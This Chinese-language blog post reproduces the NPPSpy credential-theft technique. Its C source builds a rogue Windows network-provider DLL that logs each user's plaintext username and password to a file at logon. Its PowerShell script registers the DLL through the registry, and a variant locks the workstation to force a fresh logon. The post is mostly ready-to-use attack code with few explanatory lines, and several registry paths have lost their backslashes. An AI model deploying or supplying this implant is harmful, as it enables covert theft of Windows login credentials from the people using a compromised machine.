原理:
通过修改注册表,借助系统函数,抓取Windows明文密码
操作:
复现环境:
然后将下列代码编译为dll文件:
代码语言:javascript复制#include <Windows.h>
// from npapi.h
#define WNNC_SPEC_VERSION 0x00000001
#define WNNC_SPEC_VERSION51 0x00050001
#define WNNC_NET_TYPE 0x00000002
#define WNNC_START 0x0000000C
#define WNNC_WAIT_FOR_START 0x00000001
//from ntdef.h
typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
// from NTSecAPI.h
typedef enum _MSV1_0_LOGON_SUBMIT_TYPE
{
MsV1_0InteractiveLogon = 2,
MsV1_0Lm20Logon,
MsV1_0NetworkLogon,
MsV1_0SubAuthLogon,
MsV1_0WorkstationUnlockLogon = 7,
MsV1_0S4ULogon = 12,
MsV1_0VirtualLogon = 82,
MsV1_0NoElevationLogon = 83,
MsV1_0LuidLogon = 84,
} MSV1_0_LOGON_SUBMIT_TYPE, * PMSV1_0_LOGON_SUBMIT_TYPE;
// from NTSecAPI.h
typedef struct _MSV1_0_INTERACTIVE_LOGON
{
MSV1_0_LOGON_SUBMIT_TYPE MessageType;
UNICODE_STRING LogonDomainName;
UNICODE_STRING UserName;
UNICODE_STRING Password;
} MSV1_0_INTERACTIVE_LOGON, * PMSV1_0_INTERACTIVE_LOGON;
void SavePassword(PUNICODE_STRING username, PUNICODE_STRING password)
{
HANDLE hFile;
DWORD dwWritten;
hFile = CreateFile(L"C:\NPPSpy.txt",
GENERIC_WRITE,
0,
NULL,
OPEN_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (hFile != INVALID_HANDLE_VALUE)
{
SetFilePointer(hFile, 0, NULL, FILE_END);
WriteFile(hFile, username->Buffer, username->Length, &dwWritten, 0);
WriteFile(hFile, L" -> ", 8, &dwWritten, 0);
WriteFile(hFile, password->Buffer, password->Length, &dwWritten, 0);
WriteFile(hFile, L"rn", 4, &dwWritten, 0);
CloseHandle(hFile);
}
}
__declspec(dllexport)
DWORD
APIENTRY
NPGetCaps(
DWORD nIndex
)
{
switch (nIndex)
{
case WNNC_SPEC_VERSION:
return WNNC_SPEC_VERSION51;
case WNNC_NET_TYPE:
return WNNC_CRED_MANAGER;
case WNNC_START:
return WNNC_WAIT_FOR_START;
default:
return 0;
}
}
__declspec(dllexport)
DWORD
APIENTRY
NPLogonNotify(
PLUID lpLogonId,
LPCWSTR lpAuthInfoType,
LPVOID lpAuthInfo,
LPCWSTR lpPrevAuthInfoType,
LPVOID lpPrevAuthInfo,
LPWSTR lpStationName,
LPVOID StationHandle,
LPWSTR* lpLogonScript
)
{
SavePassword(
&(((MSV1_0_INTERACTIVE_LOGON*)lpAuthInfo)->UserName),
&(((MSV1_0_INTERACTIVE_LOGON*)lpAuthInfo)->Password)
);
lpLogonScript = NULL;
return WN_SUCCESS;
}原文中,是需要修改注册表来达到效果的,
这里为了方便,我写了一个powershell脚本,来实现修改注册表这一步:
代码语言:javascript复制$path = Get-ItemProperty -Path "HKLM:SYSTEMCurrentControlSetControlNetworkProviderOrder" -Name PROVIDERORDER
$UpdatedValue = $Path.PROVIDERORDER ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
New-Item -Path HKLM:SYSTEMCurrentControlSetServicesNPPSpy
New-Item -Path HKLM:SYSTEMCurrentControlSetServicesNPPSpyNetworkProvider
New-ItemProperty -Path HKLM:SYSTEMCurrentControlSetServicesNPPSpyNetworkProvider -Name "Class" -Value 2
New-ItemProperty -Path HKLM:SYSTEMCurrentControlSetServicesNPPSpyNetworkProvider -Name "Name" -Value NPPSpy
New-ItemProperty -Path HKLM:SYSTEMCurrentControlSetServicesNPPSpyNetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%System32NPPSPY.dll"
当然你也可以写一个c 版的,方便使用,看个人喜好。
然后将上面编译好的dll,放入system32目录下:
然后运行我们的powershell脚本:
模拟用户注销、重新的登录,抓取到明文密码。
为了方便,直接加入锁屏功能,一键修改注册表 锁屏:
代码语言:javascript复制$path = Get-ItemProperty -Path "HKLM:SYSTEMCurrentControlSetControlNetworkProviderOrder" -Name PROVIDERORDER
$UpdatedValue = $Path.PROVIDERORDER ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
New-Item -Path HKLM:SYSTEMCurrentControlSetServicesNPPSpy
New-Item -Path HKLM:SYSTEMCurrentControlSetServicesNPPSpyNetworkProvider
New-ItemProperty -Path HKLM:SYSTEMCurrentControlSetServicesNPPSpyNetworkProvider -Name "Class" -Value 2
New-ItemProperty -Path HKLM:SYSTEMCurrentControlSetServicesNPPSpyNetworkProvider -Name "Name" -Value NPPSpy
New-ItemProperty -Path HKLM:SYSTEMCurrentControlSetServicesNPPSpyNetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%System32NPPSPY.dll"
Function Lock-WorkStation {
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
$LockWorkStation::LockWorkStation() | Out-Null
}
Lock-WorkStation思路来源:
https://twitter.com/0gtweet/status/1282962201943343105
